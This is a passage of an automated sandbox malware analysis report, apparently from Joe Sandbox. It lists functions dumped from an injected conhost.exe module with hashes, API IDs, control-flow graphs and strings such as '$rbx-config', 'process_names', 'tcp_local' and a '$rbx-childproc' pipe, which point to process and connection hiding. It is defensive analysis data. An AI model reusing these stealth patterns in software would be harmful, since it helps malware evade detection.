                                            • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                            • Instruction Fuzzy Hash: D1A10723704EA04AFBA8DB75F4483AF7BA1E747794F144217DE992769ACE74C04AC702
                                            Function 000002A5AF361724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 2135414181-3414887735
                                            • Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction ID: 70a983c59232ec985ca3a6a2be5a176da28e81d2d64ca5e4aaa57126921e7b2f
                                            • Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
                                            • Instruction Fuzzy Hash: CD71F927311E6587EB58EF65F89869A33A4FB86F88F401213DE4D57B6ADE38C448C341
                                            Function 000002A5AF3612B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction ID: 80291b581d2a25a7232537f4df9082142d1da61205f700674305e112e863593d
                                            • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                            • Instruction Fuzzy Hash: F8513832311B9497EBA8DF62F44835B77A1F789F99F444226DA4A07719DF3CC0598701
                                            Function 000002A5AF36EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140librarymemoryloaderCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                            • API String ID: 740688525-1880043860
                                            • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction ID: c79a9d86f3b19d078a853590984c0720b32ff8f9135d9cd8780e22b4156c37c0
                                            • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                            • Instruction Fuzzy Hash: 90518423701E2453EB9D9B66B81836B3250BB4ABB0F5807279D39473D6EF38D4498642
                                            Function 000002A5AF3633A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Running Time
                                            • API String ID: 1943346504-1805530042
                                            • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction ID: f8820993cc94fc6231c47b99bd42cb84e2527a97a663e61442b4a4d370a7a6de
                                            • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                            • Instruction Fuzzy Hash: 1E31B123B04EA097FB6ACF12B80835BB3A0F789B95F4402279E4983726DF38D4598341
                                            Function 000002A5AF3634B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$CounterInfoProcess$AllocFree
                                            • String ID: \GPU user(*)\Utilization Percentage
                                            • API String ID: 1943346504-3507739905
                                            • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction ID: 995721abaf929b9172070fab9879c0148e00e6b6940efbbc1da075e9d5196b1a
                                            • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                            • Instruction Fuzzy Hash: A4313022710FA587FB98DF22B84875B73A1FB85F95F4442279F4A43726DF38D4498601
                                            Function 000002A5AF33962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction ID: d67c4e84e13b7181da2d6704d5405f88b377d19bcfbe0063179f989f313ad541
                                            • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                            • Instruction Fuzzy Hash: 58D16D27705B50C7EB68DB69A4483AE37A1F746798F100317EA8A57B9ADF34D188C702
                                            Function 000002A5AF36A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 313 2a5af36a22c-2a5af36a294 call 2a5af36b144 316 2a5af36a29a-2a5af36a29d 313->316 317 2a5af36a6f5-2a5af36a6fb call 2a5af36c388 313->317 316->317 318 2a5af36a2a3-2a5af36a2a9 316->318 320 2a5af36a378-2a5af36a38a 318->320 321 2a5af36a2af-2a5af36a2b3 318->321 323 2a5af36a645-2a5af36a649 320->323 324 2a5af36a390-2a5af36a394 320->324 321->320 325 2a5af36a2b9-2a5af36a2c4 321->325 328 2a5af36a64b-2a5af36a652 323->328 329 2a5af36a682-2a5af36a68c call 2a5af369324 323->329 324->323 326 2a5af36a39a-2a5af36a3a5 324->326 325->320 327 2a5af36a2ca-2a5af36a2cf 325->327 326->323 332 2a5af36a3ab-2a5af36a3af 326->332 327->320 333 2a5af36a2d5-2a5af36a2df call 2a5af369324 327->333 328->317 330 2a5af36a658-2a5af36a67d call 2a5af36a6fc 328->330 329->317 339 2a5af36a68e-2a5af36a6ad call 2a5af368070 329->339 330->329 336 2a5af36a575-2a5af36a581 332->336 337 2a5af36a3b5-2a5af36a3f0 call 2a5af369704 332->337 333->339 347 2a5af36a2e5-2a5af36a310 call 2a5af369324 * 2 call 2a5af369a0c 333->347 336->329 340 2a5af36a587-2a5af36a58b 336->340 337->336 351 2a5af36a3f6-2a5af36a3ff 337->351 344 2a5af36a59b-2a5af36a5a3 340->344 345 2a5af36a58d-2a5af36a599 call 2a5af3699cc 340->345 344->329 350 2a5af36a5a9-2a5af36a5b6 call 2a5af3695a4 344->350 345->344 360 2a5af36a5bc-2a5af36a5c4 345->360 380 2a5af36a312-2a5af36a316 347->380 381 2a5af36a330-2a5af36a33a call 2a5af369324 347->381 350->329 350->360 356 2a5af36a403-2a5af36a435 351->356 357 2a5af36a43b-2a5af36a447 356->357 358 2a5af36a568-2a5af36a56f 356->358 357->358 362 2a5af36a44d-2a5af36a46c 357->362 358->336 358->356 363 2a5af36a5ca-2a5af36a5ce 360->363 364 2a5af36a6d8-2a5af36a6f4 call 2a5af369324 * 2 call 2a5af36c2f4 360->364 366 2a5af36a558-2a5af36a55d 362->366 367 2a5af36a472-2a5af36a4af call 2a5af3699e0 * 2 362->367 368 2a5af36a5e1 363->368 369 2a5af36a5d0-2a5af36a5df call 2a5af3699cc 363->369 364->317 366->358 393 2a5af36a4e2-2a5af36a4e5 367->393 376 2a5af36a5e3-2a5af36a5ed call 2a5af36b1dc 368->376 369->376 376->329 391 2a5af36a5f3-2a5af36a643 call 2a5af369634 call 2a5af369838 376->391 380->381 385 2a5af36a318-2a5af36a323 380->385 381->320 396 2a5af36a33c-2a5af36a35c call 2a5af369324 * 2 call 2a5af36b1dc 381->396 385->381 390 2a5af36a325-2a5af36a32a 385->390 390->317 390->381 391->329 399 2a5af36a4e7-2a5af36a4ee 393->399 400 2a5af36a4b1-2a5af36a4d7 call 2a5af3699e0 call 2a5af36a96c 393->400 418 2a5af36a373 396->418 419 2a5af36a35e-2a5af36a368 call 2a5af36b2cc 396->419 404 2a5af36a55f 399->404 405 2a5af36a4f0-2a5af36a4f4 399->405 415 2a5af36a4f9-2a5af36a556 call 2a5af36a158 400->415 416 2a5af36a4d9-2a5af36a4dc 400->416 406 2a5af36a564 404->406 405->367 406->358 415->406 416->393 418->320 423 2a5af36a6d2-2a5af36a6d7 call 2a5af36c2f4 419->423 424 2a5af36a36e-2a5af36a6d1 call 2a5af368f84 call 2a5af36ad28 call 2a5af369178 419->424 423->364 424->423
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction ID: ed20ad7f05566e3391daa9a5dfa6f347c9fa2e82f7603bf670514f84363d5748
                                            • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                            • Instruction Fuzzy Hash: C5D16073704B908BEFA8DB65A44839F77A0F746798F100217DA8957796CF38C498D702
                                            Function 000002A5AF36104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 434 2a5af36104c-2a5af3610b9 RegQueryInfoKeyW 435 2a5af3611b5-2a5af3611d0 434->435 436 2a5af3610bf-2a5af3610c9 434->436 436->435 437 2a5af3610cf-2a5af36111f RegEnumValueW 436->437 438 2a5af3611a5-2a5af3611af 437->438 439 2a5af361125-2a5af36112a 437->439 438->435 438->437 439->438 440 2a5af36112c-2a5af361135 439->440 441 2a5af361147-2a5af36114c 440->441 442 2a5af361137 440->442 444 2a5af361199-2a5af3611a3 441->444 445 2a5af36114e-2a5af361193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 441->445 443 2a5af36113b-2a5af36113f 442->443 443->438 446 2a5af361141-2a5af361145 443->446 444->438 445->444 446->441 446->443
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction ID: 28a3a71b1a28244ea36a1ca8b3e063b4eb4d62e1d645779944e509c5439b0e40
                                            • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                            • Instruction Fuzzy Hash: BF414B33314B949BE7A4DF21E44839B77A1F389B98F44822ADB8907A58DF38D449CB41
                                            Function 000002A5AF362518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44filethreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                            • String ID: \\.\pipe\$rbx-childproc
                                            • API String ID: 166002920-1828357524
                                            • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction ID: d14f723f8ed829822c89f5e2cfe1bc46318c53019ffdce31611c9d438ba10ac0
                                            • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                            • Instruction Fuzzy Hash: 63112632719A5083E758CB21F41875AB7A0F38AB95F944316EA9903AA9DF3CC148CB41
                                            Function 000002A5AF337050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 75e0045217a7e43ccaff272f347870daecc911886bbc532241f35b8a89f751e9
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: 8F818F23708E6587FB6CDB29B4493AF2690AB477C1F4443279E4587397DE38C44E8742
                                            Function 000002A5AF367C50 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 452 2a5af367c50-2a5af367c56 453 2a5af367c58-2a5af367c5b 452->453 454 2a5af367c91-2a5af367c9b 452->454 456 2a5af367c85-2a5af367cc4 call 2a5af3682f0 453->456 457 2a5af367c5d-2a5af367c60 453->457 455 2a5af367db8-2a5af367dcd 454->455 461 2a5af367ddc-2a5af367df6 call 2a5af368184 455->461 462 2a5af367dcf 455->462 474 2a5af367cca-2a5af367cdf call 2a5af368184 456->474 475 2a5af367d92 456->475 459 2a5af367c78 __scrt_dllmain_crt_thread_attach 457->459 460 2a5af367c62-2a5af367c65 457->460 463 2a5af367c7d-2a5af367c84 459->463 465 2a5af367c67-2a5af367c70 460->465 466 2a5af367c71-2a5af367c76 call 2a5af368234 460->466 472 2a5af367e2b-2a5af367e5c call 2a5af3684b0 461->472 473 2a5af367df8-2a5af367e29 call 2a5af3682ac call 2a5af36814c call 2a5af368634 call 2a5af368450 call 2a5af368474 call 2a5af3682dc 461->473 467 2a5af367dd1-2a5af367ddb 462->467 466->463 484 2a5af367e6d-2a5af367e73 472->484 485 2a5af367e5e-2a5af367e64 472->485 473->467 487 2a5af367daa-2a5af367db7 call 2a5af3684b0 474->487 488 2a5af367ce5-2a5af367cf6 call 2a5af3681f4 474->488 478 2a5af367d94-2a5af367da9 475->478 490 2a5af367eb5-2a5af367ecb call 2a5af363a1c 484->490 491 2a5af367e75-2a5af367e7f 484->491 485->484 489 2a5af367e66-2a5af367e68 485->489 487->455 504 2a5af367d47-2a5af367d51 call 2a5af368450 488->504 505 2a5af367cf8-2a5af367d1c call 2a5af3685f8 call 2a5af36813c call 2a5af368168 call 2a5af36b428 488->505 495 2a5af367f52-2a5af367f5f 489->495 513 2a5af367f03-2a5af367f05 490->513 514 2a5af367ecd-2a5af367ecf 490->514 496 2a5af367e86-2a5af367e8c 491->496 497 2a5af367e81-2a5af367e84 491->497 502 2a5af367e8e-2a5af367e94 496->502 497->502 509 2a5af367e9a-2a5af367eaf call 2a5af367c50 502->509 510 2a5af367f48-2a5af367f50 502->510 504->475 527 2a5af367d53-2a5af367d5f call 2a5af3684a0 504->527 505->504 554 2a5af367d1e-2a5af367d25 __scrt_dllmain_after_initialize_c 505->554 509->490 509->510 510->495 518 2a5af367f0c-2a5af367f21 call 2a5af367c50 513->518 519 2a5af367f07-2a5af367f0a 513->519 514->513 515 2a5af367ed1-2a5af367ef3 call 2a5af363a1c call 2a5af367db8 514->515 515->513 548 2a5af367ef5-2a5af367efa 515->548 518->510 537 2a5af367f23-2a5af367f2d 518->537 519->510 519->518 544 2a5af367d85-2a5af367d90 527->544 545 2a5af367d61-2a5af367d6b call 2a5af3683b8 527->545 542 2a5af367f34-2a5af367f42 537->542 543 2a5af367f2f-2a5af367f32 537->543 549 2a5af367f44 542->549 543->549 544->478 545->544 553 2a5af367d6d-2a5af367d7b 545->553 548->513 549->510 553->544 554->504 555 2a5af367d27-2a5af367d44 call 2a5af36b3f0 554->555 555->504
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction ID: 6a99c8e0591ed7087b8718fd936989789c2f6efed9634cc5f300d680653cd6cb
                                            • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                            • Instruction Fuzzy Hash: C981D163710E6047FBDC9B25B44D3AB6692AB87BC4F944317AA0947397DF78C84D8312
                                            Function 000002A5AF369AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 558 2a5af369aac-2a5af369aea 559 2a5af369af0-2a5af369af3 558->559 560 2a5af369b9e 558->560 561 2a5af369ba0-2a5af369bbc 559->561 562 2a5af369af9-2a5af369afc 559->562 560->561 563 2a5af369b96 562->563 564 2a5af369b02-2a5af369b11 562->564 563->560 565 2a5af369b13-2a5af369b16 564->565 566 2a5af369b1e-2a5af369b3d LoadLibraryExW 564->566 567 2a5af369b1c 565->567 568 2a5af369bdd-2a5af369bec GetProcAddress 565->568 569 2a5af369b3f-2a5af369b48 GetLastError 566->569 570 2a5af369bbd-2a5af369bd2 566->570 573 2a5af369b89-2a5af369b90 567->573 568->563 572 2a5af369bee-2a5af369bf9 568->572 574 2a5af369b4a-2a5af369b5f call 2a5af36c4d8 569->574 575 2a5af369b77-2a5af369b81 569->575 570->568 571 2a5af369bd4-2a5af369bd7 FreeLibrary 570->571 571->568 572->561 573->563 573->564 574->575 578 2a5af369b61-2a5af369b75 LoadLibraryExW 574->578 575->573 578->570 578->575
                                            APIs
                                            • LoadLibraryExW.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369B31
                                            • GetLastError.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369B3F
                                            • LoadLibraryExW.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369B69
                                            • FreeLibrary.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369BD7
                                            • GetProcAddress.KERNEL32(?,?,?,000002A5AF369C6B,?,?,?,000002A5AF36945C,?,?,?,?,000002A5AF368F65), ref: 000002A5AF369BE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction ID: d1b03e9ac34db2265fe7d26f89378359d40063cef71ce41dfcf072e1c73c7cba
                                            • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                            • Instruction Fuzzy Hash: 15316122313E6492EF99DB16B8087A73394F74ABA0F5907279D1A47796DF3CC44C8352
                                            Function 000002A5AF373400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                            • String ID: CONOUT$
                                            • API String ID: 3230265001-3130406586
                                            • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                            • Instruction ID: 22a39c5d958196bcb3a0b6b4e22296f4ce685981477b0783177a06bf8eb8e280
